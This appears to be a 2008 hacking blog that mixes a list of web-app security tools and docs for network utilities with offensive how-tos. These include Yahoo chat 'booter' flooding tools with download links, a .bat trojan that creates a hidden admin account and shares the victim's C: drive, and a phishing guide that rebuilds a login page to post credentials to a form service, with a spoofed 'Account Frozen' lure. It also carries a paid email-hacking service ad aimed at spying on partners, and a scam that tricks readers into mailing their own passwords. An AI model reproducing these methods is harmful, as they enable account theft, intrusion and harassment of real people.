Social Icons

Pages

19 August 2008

application security assessments

If you do Web application security assessments, this page is for you. We've gathered all of the tools and techniques discussed in Hacking Exposed: Web Applications (that we use every day as consultants) and cataloged them here. This is an abbreviated recitation of Appendix B in the book, with live hyperlinks for easy access. Keep your eyes on this space as we post custom scripts and tools from the authors!

Nish Bhalla's secret.dll and secret.htm are provided here as examples to help interested readers follow along with the book section "An Example of Binary Analysis" starting on page 416.

Free Web Security Scanning Tools
Nikto
N-Stalker NStealth Free Edition
Burp Suite
Paros Proxy
OWASP Webscarab

SQL Injection
SQL Power Injector by Francois Larouche
Bobcat (based on "Data Thief" by Application Security, Inc.).
Absinthe - free blind SQL injection tool
SQLInjector by David Litchfield
NGS Software database tools

Cross-Site Scripting (XSS)
RSnake's XSS Cheat Sheet
XSS-Proxy

IE Extensions for HTTP Analysis
TamperIE
IEWatch
IE Headers
IE Developer Toolbar
IE 5 Powertoys for WebDevs

Firefox Extensions for HTTP Analysis
LiveHTTP Headers
Tamper Data
Modify Headers

HTTP/S Proxy Tools
Paros Proxy
WebScarab
Fiddler HTTP Debugging Proxy
Burp Intruder
WatchFire PowerTools

Command-line HTTP/S Tools
cURL
Netcat
Sslproxy
Openssl
Stunnel

Sample Applications
Bayden Systems' "sandbox" online shopping application
Foundstone Hacme Bank and Hacme Books

Web Site Crawling/Mirroring Tools
Lynx
Wget
Teleport Pro
Black Widow
Offline Explorer Pro

Profiling
HTTPrint for fingerprinting web servers
Jad, the Java Dissasembler
Google search using "+www.victim.+com"
Google search using “parent directory” robots.txt

Web Platform Attacks and Countermeasures
Microsoft IIS Security Bulletins and Advisories
Apache Security Bulletins
Metasploit Framework
Microsoft URLScan
Apache ModSecurity

Commercial Web App Vulnerability Scanners
Acunetix Enterprise Web Vulnerability Scanner
Cenzic Hailstorm
Ecyware GreenBlue Inspector
Syhunt Sandcat Suite
SPI Dynamics WebInspect
Watchfire AppScan
NTObjectives NTOSpider
Compuware DevPartner SecurityChecker
WhiteHat Security

Web Authentication Attack Tools
Brutus AET2
Hydra
WebCracker
NTLM Authentication Proxy Server (APS)

XML Web Services (SOAP)
WebService Studio
WSDigger
SoapClient.com
XML eXternal Entity (XXE) Attack
XPath Injection
"Blind XPath Injection"

hacking Exposed Web Applications

Since 1999, Hacking Exposed has educated millions of readers about the ease of hacking into computer networks and systems. Hacking Exposed: Web Applications 2 shows you how to meet this challenge with the two-pronged approach adapted from the original Hacking Exposed, the best-selling digital security book of all time.

First, we catalog the greatest threats your web application will face and explain how they work in excruciating detail. How do we know these are the greatest threats? Because we are hired by the world's largest companies to break into their web applications, and we use them on a daily basis to do our jobs. Once we have your attention by showing you the damage that can be done, we tell you how to prevent each and every attack.

Hacking Exposed: Web Applications - and this website - are edicated to bringing your web apps' security back under control. We sincerely hope that all of our many years of experience translate into tremendous time savings for those of you responsible for securing web apps.


Notable
Hacking Exposed Web Applications and co-authors Joel Scambray and Caleb Sima star in the "Oceans 11" of computer security: The Code Room Vegas. Check out this 28-minute video dramatizing 3 real-world hackers who take down a Vegas casino (or download your own copy).

11 August 2008

Exploited Clients Terror Booter

Named as Expoited Client Terror, this Yahoo Boot Software claimed can be used to boot Yahaven Chat Client, and also YahElite Chat Client. But, there is one condition to make this booter working good to attack Yahaven Yahelite or others chat client: You must have huge bandwith!

Make sure you place KewlButtonz.ocx file in your system32 before you run this Expoited Booter. Made by Satma, Expoited Client Booter has boot setting: Packet Mixer, Packets Reduce, boot Sensor, Auto Boot, Smart Attact, Shouts Site.

Don't want to wait to download this yahoo boot software? Just click here.

SniffIM: Spy, Sniff, Track, Record YM IM in a Netwok

This is not yahoo boot software, this is just small yahoo tools that can be used to track or spy the messengering conversation going on in local network. Has a name SniffIM, this software will sniff, and record the text IM, or even Conference in LAN, or other network for Yahoo Messenger User. All of Message going out and in will be record and viewing in SniffIM.

Make sure before you run this software you choose the correct modem as your Ethernet network such as Bluetooth adapter or others. Wanna try SniffIM? Just click here to download SniffIM.

Viprasys ASL Bomber Booter

This is another yahoo boot or yahoo bomber that can be download from here. Has a login delay speed and also paket delay. You can load bots up to 500 login. There are two options available in the Viprasys ASL Bomber: ASL Bomber that assorted 110 random cased strings of packets and IM or PM Hell. Enjoy Viprasys ASL Bomber Booter.

For others alternative download just copy paste the links below:

http://www.2shared.com/file/3578145/289d1b4a/Viprasys_ASL_Bomber_beta.html
http://yourupload.com/fh/download/9491/Viprasys_ASL_Bomber_beta.zip.html
http://sharebee.com/d13174a9
http://rapidshare.com/files/128895168/Viprasys_ASL_Bomber_beta.zip.html

Fizzi Room Locker 3.0

This boot software almost like Room Destroy. You can login in chat room with many of yahoo bots id. Even you can lock the chat room, by fulfilling the chat room with all of your id bots. This Room Locker calls as Fizzi Room Locker 3.0. The name might be derive from the author of this software

You can send message, annoy chat room, lagging and many more. The emoticons interface provided by Fizzi Room Locker is complete. With simple design and easy to use it. You can download Fizzi Room Locker here.

03 August 2008

Methods of Cracking Email Passwords

As mentioned earlier, one of the most successful method is achieved with the used of keyloggers and spy software. There are lots of spyware, logging tools available today such as 007, RemoteSpy, Netvizor, Email Spy, Chat Spy, Spector Pro, eBlaster, Invisible Keylogger, to name a few. This software will create a self extracting or installation file, you can then run it in the computer for surveillance, or email it to your target. The only question is, how can you convinced the recipient to open it?

Most hackers does not really hacking passwords by penetrating Yahoo, Hotmail, Gmail, and AOL servers, instead they will go for the easy way - the end user, that's you. It's not what you see on the movies such like "Hackers," "SwordFish," and so on. Too good to be true! They don't actually hack, but logs every stroke on your keyboard including the passwords you have input.

Keep in mind that computer surveillance Programs should be used only if necessary, it was not created to invade someone's privacy. If you are going to use it, be a responsible user.

We don't endorse hacking or spying, this article was written to exposed the scam behind the Email Hacking Business.

GenIP

GenIP

IA small utility, based on the NMap target specification code, for quickly and easily generating lists of IP addresses.

Developer

Dave Armstrong

Usage

genip [ -h ] [ -i filename ] [ ... ] genip -r

Options

-h
Display uage information.
-i
Read target specifications from the give filename. If a filename of "-" used, target specifications are read from standard in. Target specifications read from input files are processed in NMap mode regardless of the presence of the -r option.
-r
Specify range mode (see below).

Modes

GenIP has two modes of operation that are detailed below:

NMap Mode (Default)

In this mode genip will expand all target specifications listed on the command line. Since genip is essentially just the NMap target parsing code it functions in exactly the same way. Here is what the NMap documentation has to say about target specification:

Everything that isn't an option (or option argument) is treated as a target host specification. The simplest case is listing single hostnames or IP addresses on the command line. If you want to scan a subnet of IP addresses, you can append /mask to the hostname or IP address. mask must be between 0 (scan the whole Internet) and 32 (scan the single host specified). Use /24 to scan a class "C" address and /16 for a class "B". There is also a more powerful notation which lets you specify an IP address using lists/ranges for each element. Thus you can scan the whole class "B" network 192.168.*.* by specifying "192.168.*.*" or "192.168.0-255.0-255" or even "192.168.1-50,51-255.1,2,3,4,5-255". And of course you can use the mask notation: "192.168.0.0/16". These are all equivalent. If you use asterisks ("*"), remember that most shells require you to escape them with back slashes or protect them with quotes.

Range Mode

In this mode two (and only two!) IP addresses must be specified, in dotted quad notation, and the output is all the addresses between the two (inclusive). This mode can be used to cross class boundaries.

Example

In its most basic form genip simply echos the IP addresses listed on the command line:

> genip 10.1.1.1 10.3.4.5
10.1.1.1
10.3.4.5

By use one of the many expansion methods detailed above a large number of IP addresses can be generated from simple command line specifications:

> genip 10.1.1.1-3
10.1.2.0
10.1.2.1
10.1.2.2

By selecting range mode (with the use of the -r flag) it is a simple matter to generate address lists that cross class boundaries:

> genip -r 10.1.1.254 10.1.2.2
10.1.1.254
10.1.1.255
10.1.2.0
10.1.2.1
10.1.2.2

Download

The latest version of genip can always be obtained from:

  • genip.tgz (md5sum: 9e5c82204487c46cbab32057d711177e)

ETrace

etrace is a configurable static port network tracing tool, similar to traceroute, but supporting ICMP, TCP, UDP and other IP protocols.

Usage

etrace [ -BbCcnv ] [ -p profile ] [ -F config ] [ -i interface ] [ -I icmp-type ] [ -T port ] [ -U port ] [ -P protocol ] [ -r probe-count ] [ -t timeout ] [ -1 hop ] [ -h hop ] [ -m hop ] [ -A address ] [ -s port ] [ -f flags ] [ -d data ] [ -D data-file ] [ -R count ] [ -q seq] [ -w window ] target [...]

Options

etrace has a wealth of options ranging in function from controlling output to the detailed construction of trace packets.

Profile Options

A profile is a pre-configured list of options stored in a shared, or user specific configuration file. By defining profiles, complex etrace option sets can be easily accessed with a single command line option.

-p, --profile
Specify a profile.
-C, --clear
Clear the current list of probes. This option can be used to allow a profile to inherit options from another profile, but specify it's own list of probes.
-F, --config
Specify an alternative profiles file.

Interface options

-i, --interface
Specify interface. If unspecified, etrace will examine the routing table and select the most appropriate interface for each target address.
-c, --promisc
Put in interface into promiscuous mode. As this option increases the load on the system in general, it should only be used if spoofing of source packets address is enabled with the "-A" option.

Trace Type Options

-I, --icmp
Specify an ICMP trace and the packet type to use. ICMP traces may use Echo (E or P), Timestamp (T or S), Netmask (N or M) or Info (I). The default trace probe is an ICMP Echo.
-h, --hop
Specify a specific hop to investigate.
-m, --maximum
Specify the maximum number of hops.
-r, --probes
Set the maximum number of probes to send per hop. The default is 3.
-t, --timeout
Set the maximum amount of time, in milli-seconds, to wait for a response to a probe. The default is 3000 (three seconds).

Packet Construction Options

-A, --address
Specify the source IP address of generated packets.
-s, --source
Set the source port of the generated probe packets. If unspecified, etrace uses a random high port.
-f, --flags
Specify TCP and/or IP flags. Takes a comma delimitered list of any of the following flags: RF, DF, MF, FIN, SYN, RST, PSH, ACK, URG, ECE, CWR (Default: SYN)
-d, --data
Specify the data content of generated probe packets. Standard meta-characters are recognised (e.g. "\n\t") as are binary values given in octal (e.g. "\000\x00");
-D, --data-file
Load the data content of the generated probe packets from the specified file. Filenames beginning with '@' a loaded from the etrace shared data directory (usually /usr/local/share/etrace). etrace currently ships with the following predfined packet data files: dns, ike.
-R, --random
Fill the data content of the generated probe packets with the specified number of random bytes.
-b, --badcksum
Generate and send probe packets with bad checksums.
-q, --seq
Specify the TCP sequence number.
-w, --window
Specify the TCP window size.

Output Options

-v, --verbose
Increase output verbosity.
-B, --debug
Enable debugging output.
-n, --numeric
Disable name resolution.

Examples

etrace www.sample.com

Launches a trace ICMP Echo, the default, trace to www.sample.com. Specifiying the options "-I E" whould accomplish the same results.

etrace -T 80 www.sample.com

Similar to the previous example, except the trace is performed on TCP port 80.

etrace --udp 53 --data-file @dns ns.sample.com

Starts are trace to ns.sample.com on UDP port 53 with the trace packets containing data loaded from the file /usr/local/share/etrace/dns (a file supplied with etrace that contains a simple dns request to resolve 127.0.0.1).

etrace -p dns -p fast ns.sample.com

The default profiles shipped with etrace include "dns" (which equates to the options shown in the previous example) and "fast" (which decreases both timeouts and the number of probes sent for each hop, as well as disabling name resolution). Profiles are stackable, with latter options overriding those specified in earlier profiles.

Files

~/.etrace
User specific profiles.
/usr/local/share/etrace/profile
System wide profiles.

Author

Dave Armstrong

Download

The latest release of etrace can be obtained from:

Making your own trojan in a .bat file

Open a dos prompt we will only need a dos prompt , and windows xp... -Bazics- Opening a dos prompt -> Go to start and then execute and write cmd and press ok Now insert this command: net And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here they are: net user , net share and net send We will select some of those commands and put them on a .bat file. What is a .bat file? Bat file is a piece of text that windows will execute as commands.

Open notepad and whrite there:

dir pause And now save this as test.bat and execute it. Funny aint it ?
---------------------- Starting ------------------- -:Server:- The plan here is to share the C: drive and make a new user with administrators access Step one -> Open a dos prompt and a notebook The dos prompt will help you to test if the commands are ok and the notebook will be used to make the .bat file. Command n 1-> net user neo /add What does this do? It makes a new user called neo you can put any name you whant Command n 2-> net localgroup administrators neo /add This is the command that make your user go to the administrators group. Depending on the windows version the name will be different. If you got an american version the name for the group is Administrators and for the portuguese version is administradores so it's nice yo know wich version of windows xp you are going to try share. Command n 3->net share system=C:\ /unlimited This commands share the C: drive with the name of system. Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend. -!extras!- Command n 4-> net send urip I am ur server Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip. ->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user. First we need to make a session with the remote computer with the net use command , you will execute these commands from your dos prompt. Command n 1 -> net use \\victimip neo This command will make a session between you and the victim Of course where it says victimip you will insert the victim ip. Command n 2-> explorer \\victimip\system And this will open a explorer windows in the share system wich is the C: drive with administrators access!

Messenger Tips & Tricks

Here are some things you can do with your Yahoo messenger. I will put them in three sections - Easy, Moderate and Hard to show what level of computer knowledge is recommended. Easy Send a group message This one is really simple. Just right click on the group title in your contact list and select Send Message to all in this group . Alternatively hold down the Ctrl and left click on the names you wish to send a message to. Once you have hilighted the required names simply right click on a name and select Send a message . Change webcam status message Really simple and hardly a secret. Click Login at the top left and then click on Preferences. Once the preferences window has opened click on Webcam in the list on the left. Now on the right at the bottom you should see a box and next to it it says When my Webcam is on, change my status message to . Tick the box and then type the message you want people to see when you have your webcam on. Moderate Change the title bar text You can change the text that appears in the bar at the very top of the messenger window by simply editting the ymsgr.ini which you will find in the same folder as your messenger. Locate the ymsgr.ini file and open it in notepad or any text editor. Then at the end add the following [APP TITLE] caption=YOUR TEXT changing YOUR TEXT to whatever you want it to say. Then save the file and close messenger. When you restart messenger you will see your new message. Advanced Edit/delete your custom away messages Please only attempt this if you are confident at registry editting. Click Start and click on Run . In the run window type regedit and press Enter. Once regedit has opened click the following items in the list on the left. You can either double click the folder image or single click on the + sign. First open HKEY_CURRENT_USER then Software then Yahoo then Pager then profiles . Next open the folder for the accounts who's away messages you want to edit or delete. Now open the Custom Msgs folder. In here you will see all the status messages you have set next to a number. The Number_DND bit sets whether it shows you as busy or not with that status. 1 will show you as busy while 0 will not and 2 will set you as idle. The away msg entry is the last away message you used.

How to boot (beginner)

This tutorial will cover the bare basics of operating a one "bot" (yahoo Id) yahoo booter. Yahoo has a tendency to "patch" (change the login algorithm). So don't be surprised if the booter used in this tutorial no longer works 2 or 3 weeks after the release of this tutorial. If you are reading this because of recent errors you received while executing a new booter, i would suggest reading the "How to register files" tutorial first.

The terminology remains the same, regardless of the booter.

Ok, lets begin, first, I will briefly cover two of your most common errors you receive while operating this booter. 1) unregistered/missing file This problem occurs when you do not have a particular".ocx" or ".dll" registered in your system folder. Find the missing file first then read my tutorial on "how to register files"

2) Run time errors This is caused by a verity of mistakes on the programmers part. NOT YOURS! It can range from not setting restrictions on arrays which result in buffer overflows...yes buffer overflows. To the more common programming error of declairing a wrong type variable (int instead of float or char etc)...In in more simpler terms, SHITTY CODING lol!

Run type errors is an issue that I cannot help you on. Your best bet is to find another booter. Most, if not all, of your everyday "yahoo booter" programmers are self taught and take little consideration into working out all the bugs...All booters will have errors. FIND ME ONE THAT DOSEN 'T AND I"LL PROVE OTHERWISE.

MYTHS/FACTS 1) Everyone is bootable. FACT Some people are harder than others, but for the most part anyone can be disconnected from yahoo.

2) All booters are key logged . MYTH Most of your booter programmers are kids ranging in the age of 14 to 25 (WTF!). They write these programs for bragging rights and recognition. Some programmers do key log...and when they are caught there reputation is almost always tainted from it. For the most part...booters are clean.

NOTE: If you ever do run across a booter that is infected, it is highly possible that the person hosting the download is responsible, not the author. Some webmasters will bind Trojans with their downloads. If you ever come across this, immediately report the webmaster to their host.

3) Booters are illegal. MYTH This is a tricky question. Simply possessing a booter is not illegal. Using a booter on a consenting person for YIM hardening (boot prevention testing) or on yourself for chat client comparison is also fine.Booters can be a very valuable tool when used properly. Those who choose otherwise ruin it for the rest of us.Anything used for network testing can be turned into a malicious tool to harass others. The intent of any booters provided by this site is for testing/educational uses only. If you cannot follow these rules then please leave my site immediately.

Get The Ball Rollen Ok, lets begin. As you know your object is to kick another yahoo member out of a chat room. First we need to create a bot (yahoo id). Never use your own. Bots will be banned with time. And if you log your main yahoo account into a booter, you risk the chance of never getting that name back. So take the time to make some fake yahoo chat accounts and keep all the passwords the same.

Once we made our bots, 4 or 5 is good enough for now. We will walk through the steps below in using a one bot login booter.

NOTE: the booter provided simply serves as a basic understanding of how a booter functions. Do not believe for a second this will kick everyone off chat. Some people it will ...others it will just piss off.

DOWNLOAD BOOTER

1) Double click the .exe file. Labeled "Colts 1Bot YaHell.exe". A window containing the main forum labeled "Colts 1Bot YaHell" should pop up.

FIGURE 1: FIle contents.

FIGURE 2: Main I-face

2) Now we need to enter the bot name in the label titled "Y! Name" and the password into the label titled "Y! Pass" see figure 3

FIGURE 3: Bot name and pass entered

3) Pretty much self explanitory...hit the "login button" see figure 4

FIGURE 4: Bot Connected

4) Now you type your nameyou want to boot into the label titled "Lamer" and choose one of your three booting options. Which include PM Bomb, Imv Bomb, and Buzz Bomb.

Yahoo Unix/Linux & Mac Chat Clients

This is not a list of recommended clients, nor am I saying all these clients are safe to use. I made this as a list of all Unix/Linux & Mac chat clients I could find. As with any program you download and use you are doing so at your own risk.

Unix/Linux Clients

YahELite by Deepthawt Runs on WINE.

Yahmini by Deepthawt Comes with source code.

Gyach by buy_more_pepsi Gyach is a GTK+ based Yahoo! Chat client.

Gyach Advanced by Phrozensmoke
GYach Enhanced in a greatly improved version of the original GYach. It is an unofficial 'fork' of the GYach project.

Curfloo by jfcinnovations
Curfloo is a console CLI/curses based chat client for the Yahoo Chat system.

Curphoo by the_cpu_fan
It doesn't run on windows. It is hard to install. It doesn't have buttons. It doesn't support smileys. It doesn't support fonts.

Magnesium maintained by Jory Pratt
Magnesium was originally written by Alex Mercader and is just Curphoo (which he also wrote) with a GTK gui. Can run on windows. It is now maintained by Jory Pratt.

Zinc
What is Zinc? Zinc stands for Zinc Is Not Cur(fl|ph)oo. Zinc is a Yahoo! chat client for GNU/Linux, FreeBSD, and Mac OS X. Zinc is written in Python and released under GPL. Zinc originally started out as a code fork of Curphoo 0.3.7 but it has been completely rewritten since then. Currently there is "apparently" absolutely no Curphoo or Curfloo source code in Zinc.

ncchat by ctrl_v_esc ncchat is a Yahoo chat client for Linux written in C/Ncurses.

GAIM
Gaim is a messenger program that can be used to log onto MSN, AIM, ICQ, Yahoo!, IRC, Jabber and more. It will also supports Yahoo chat.

Mac Clients

Crappy Chat by Erik A mac client by the writer of Ychat

Charla by Peter Ammon
Charla allows you to connect to the Yahoo! Chat boards, in the same way that Yahoo! Messenger for Windows provides.

ChitChat by GostCoder
ChitChat is a Yahoo! Chat client. It enables the user to communicate with others over the global Yahoo! Chat network using an interface that should be comfortable for anyone who has used AOL Instant Messenger or a similar service.

Zinc
What is Zinc? Zinc stands for Zinc Is Not Cur(fl|ph)oo. Zinc is a Yahoo! chat client for GNU/Linux, FreeBSD, and Mac OS X. Zinc is written in Python and released under GPL. Zinc originally started out as a code fork of Curphoo 0.3.7 but it has been completely rewritten since then. Currently there is absolutely no Curphoo or Curfloo source code in Zinc.

Scanning - Proxies

Introduction

So you need some proxies so you don't get the FBI knocking on your door? The best way is to find them yourself and you've come to the right place to do just that.

Necessary Tools

*NOTE: I have downloads restricted to hits from my site, so if you get "403 Forbidden" your browse or download manager is not sending a proper referral link. Try using IE, hold shift (bypasses download managers), and left click the link, that should defiantly work.

  • Proxy Hunter v3.1 B1 - Used to scan for proxies of any kind.
  • FlashFXP - A great ftp client designed with the FXP Groups in mind. (Used in Proxy FAQ)

Installation & Setup

First thing you need to do is install Proxy Hunter, just run the setup program and let it do it's thing. Now extract the settings file somewhere so we can import it to PH (Proxy Hunter). Start up PH and and go to the menu System -> Load Options, and point it to the file you just extracted. I'm sure exactly what options this loads but I'm pretty sure it loads the verifying web pages and nothing else.

Now go to System -> Change Options and make sure it's on the "Search&Verify Options" tab. Here you can change the Parallel Sockets to a suitable number depending on your machine and connection. I have DSL and P3 500MHz and I use 260 for Searching and 120 for Verifying. With 56k the default settings should be good. You can also adjust the timeout settings depending on how through you want your search to be. For searching I have my timeouts set to 10s and 20s, and for Verifying 10s and 45s.

On the "Other Options" tab you can set it up to redial your modem if you get disconnected, and there are also some other options which do not really affect scanning and can be adjusted to your liking.

Picking an IP Range

I have found no way to find good proxy ranges yet. I usually just scan the ranges I have found a lot of pubs on and that seems to work. If you don't pub scan yourself check out some scan posts and see what ip's they are scanning. Once you find something that looks good move onto the next section.

Scan Away

First thing we need to do is get the ip that was picked into the queue, this is fairly tricky as there are many options and types of proxies you can scan for. On the "Tasks" pane on the main window click the "Add Task" button at the bottom of the program. Select "searching Task" and click next. On this screen press the "Add" button on the right and it will bring up another dialog box. I personally like to scan whole ranges at a time (216.5.0.0-216.5.255.255) and PH gives us an easy way to enter this. If you want to scan just specific gaps of ips use the "Start&End Range" option. Otherwise to use my method select "Start + Subnet Size" and plug your ip into the "Start addr:" blank. Change the last two number to zero and then enter "1B" in the "Subnet size:" blank. If you want to scan more that one range in a row change the value 1B accordingly (2B, 3B, 4B, etc.). Once you have this ready press ok and it will enter into the box as a start and end range for you.

Click Next again and go to the next section, here you pick what ports you want to scan and what types of proxies your looking for. I only scan for SOCKS proxies because they are the most useful for pubbing and scanning for pubs. Click the "Defined" button and a box should load that is blank. Press the "open" button here and load the Default settings for this box (only needs to be done once). This now shows pretty much all the different types of proxies you can scan for. For now just select the one listed as Protocol "SOCKS" and then click use. It will ask you "Must Try?" and what this means is if the connection fails to the IP should it try this one anyway (only useful when scanning multiple ports). Just press yes saying it should always check for SOCKS on Port 1080.

Now you can press finish and it will add your ip to the queue. You can queue up as much as you'd like and once your ready press the blue play button in the upper right corner of the program. This will start the search for SOCKS proxies. During the scan you can switch over to the "Results" tab to see what it is finding. I'll explain what all this means in the next section.

Results

On the "Results" you can see exactly what is being found with your scan, don't be discouraged if nothing is there, it takes a while before any are found sometimes. Once it does find some it will immediately test them out for you and list the Status in that column. Here is what some of the status messages mean:

  • GOOD! - Duh... a good working proxy
  • Not Matching - The proxy can be connected to but the data received does not match what is expected (This is rare for SOCKS proxies)
  • Undecidable - Based on the information returned PH cannot decide if this proxy should be marked "GOOD!" or "Not Matching"
  • Unknown - PH cannot tell what the heck this is
  • Protocol Error - The port scanned is open but when trying to use the protocol being tested an error was received
  • Need Authentication - This proxy server needs a username and password
  • Connection Failed - The ip being tested is rejecting your connection to that port
  • Connection Timeout - The proxy is not responding to the connection request
  • Verification Timeout - It connected to the proxy but cannot verify due to a timeout.

Once it is done scanning I like to sort it by "Timing" by pressing the title of that column until the GOOD proxies are on top. This sorts it with the quickest to respond proxies on the top, using these will give you faster connection times.

How to Hack Gmail, Yahoo, Hotmail

In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack.But in this new version this problem is eliminated and this is has become more fullproof than the previous version.

First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.Now follow the following steps :
  1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
  2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
  3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
  4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=“post” action=“https://login.yahoo.com/config/login?” autocomplete=“off” name=“login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
  5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
    put the following code after placing your form id:
<form name=“New_Form” action=“http://www.webformdesigner.net/wfd_f2.php?id=Your Form ID Here” method=“post” enctype=“application/x-www-form-urlencoded” onsubmit=“return New_Form_CF();”>

Now Save the yahoofake.html.

To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.

First of all upload your page using some free webhosting services.

Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”. Now select your site name as mail.yahoo.com/support. You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.

Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.

After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked. If you have your own ideas plz write it as comment to this post. Your participation is always appreciated.

Good Luck !!

EMail Hacking Passwords Hacking

We Hack Passwords for $100 USD

We Crack all major web based emails

This include Hotmail, Yahoo! AOL and Gmail

We Provide Proofs Before payment.

We do not sell Password hacking tools. please do not email us asking for hacking, cracking tools. if

you are looking for email password hacking software you can visit our partner website. click here

to visit HACK PASSWORDS V2.0!

Keywords on what we do

Hacking passwords, email password hacking, hacking hotmail passwords, hack yahoo

passwords, email hacking, hack hotmail passwords, Hacking email passwords, hack hotmail

passwords, hack gmail passwords, email hacking tools, password cracking, Aim cracking

password hacking hotmail. yahoo passwords, email password hacking.

Warning!

We do not Entertain bogus order if any one try to add Bogus order for fun We will trace

him/her.

Important

If you are here to hack someone's yahoo, hotmail, gmail or any other email account please

make sure you have not placed an order with any other email hacking group on the net. You

will never be able to get into anyone's account if you have submitted your order to multiple

groups. do not submit your order with us if you have already hired someone else to get this

job done for you.

This unique service is 100% legal and helps you crack passwords to any email so if you need to check on your husband, wife, girl friend, boy friend or whoever just fill out order form and we will do the rest.

Due to spam and fake orders we do not complete all requests we get so if you are serious about your order and want to make sure your order is not deleted from our database please fill out all the required information correctly.

Please Read This Note

A fee for retrieving password is 100USD. This is very affordable comparing to what our competitors are offering. Usually we hack passwords within 2-3 days however if you require early email hacking you can contact us at hacking@live.co.uk please write *quick order* in subject line.

Note we charge $9.99 for this service and have lots more chances of success because it also proves to us that you are serious and need our service. There are people out there who misuse our service we have been getting passwords, since most orders were fake we went short of payments that is why we usually delete requests that we think are fake.

alternatively if you do not wish to contact us please write quick order in your reason. ensure you have a valid reason. we do not accept reasons such as "my hotmail account has been hacked and i need it back". We perform hacking to active accounts. if you have any question contact us at yourhackers(at)hotmail.com.

Click Here to Place your order for email password hacking

E-mail Passwords Hacking Software!

Would you like to hack email passwords on your own? Paying for a password can be very costly especially if your target is changing password every week. You do not have to pay someone every time you are in need of hacking an email. We have designed email password hacking software that will get you password to any email account instantly including Hotmail, Yahoo, Msn, Gmail, AOL, Lycos, Rediff and all other web-based email accounts 100% on your own.

Hack Passwords V2.0 by hackpasswordsv2.com is no 1 selling password hacking software that gives you instant access to any email.

Hacking of any Web-based Mail Account

Web Based email password hacking or cracking is one of our all time favourite and unique hobby. We understand people forget email passwords but there is no need to kick yourself, we can recover lost or stolen passwords. Try out this software if you would like to recover your password or hack any other email account.

If you require any specialized services , you can contact us at yourhackers@hotmail.com

hack yahoo passwords, hack hotmail passwords, password hacking, email hacking, email surveillance, email password hacking.

With YH you can learn to hack emails , get passwords to any email, Password hacking, hack yahoo email, hacking hotmail passwords, crack yahoo email.

Protect your email passwords!

Are you a victim of password theft? do you have any idea how someone can steal your account online? internet was never a safe place click on the link above to find out how you can protect your yahoo, hotmail, gmail account from being hacked. information provided on that page is free of charge.

After Payment

Once your target's email password has been hacked proofs will be sent to you. after verification you are required to make payment of 100USD once that is done please wait few hours ( usually we send password within hour) it can take more time due to the time frame between countries. I know it is hard to trust us due to the nature of service we provide but we ask you to please stay patience.

hack a yahoo id

This crack works for both Yahoo and MSN (Hotmail), as both password recoveries are done the same way. This crack has worked every single time (excluding once, and I am unsure why) I have tried it. So far this is the one and ONLY working crack (for free) that I have found for either site.
STEP 1-
Log in to your own account. Note: Your account must be at least 30 days old for this to work.

STEP 2-
Once you have logged into your own account, compose an e-mail to either htmal_password_recover@hotmail.com (for MSN) or information_recovery06@yahoo.com (for Yahoo).These are mailing addresses to the Yahoo or MSN staff. The automated server will send you the password that you have 'forgotten', after receiving the information you send them.

STEP 3-
In the subject line type exactly: "password retrieve". NOT CAPITALS!! The capitals tell the automated server to kick in, just one capital will send you e-mail to an actual person working for either MSN or Yahoo, and once they see what you are trying to do your account will be deleted. I know this from experience.

STEP 4-
On the first line of your mail write the email address of the person you want to hack.

STEP 5-
On the second line type in the e-mail address you are using.

STEP 6-
On the third line type in the password to YOUR email address (your OWN password). The server of both places needs your password so it can send a JavaScript from your account in the server to extract the other email addresses password. In other words, the system automatically checks your password to confirm the integrity of your status. Remember you are sending your password to a machine not a man. The process will be done automatically by the user administration server.

STEP 7-
The final step before sending the mail is, type on the fourth line the following code exactly "cgi-bin/$et6431&pwrsa". Note: This only needs to be done for Yahoo.

Haking "admin" from "user" mode n more

Haking "admin" from "user" mode n more WELCOME TO www.hackingarticles.tk one stop compilation for Ethical Hacking Click here for HOME page really that is possible ! Refer to the other articles on this wiki for the same topic as windows seems to have fixed this bug.. still u can browse for educational purpose u know why is it a "user" account because it lacks come service layer than that in "administrator" account Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt. Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password). The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix 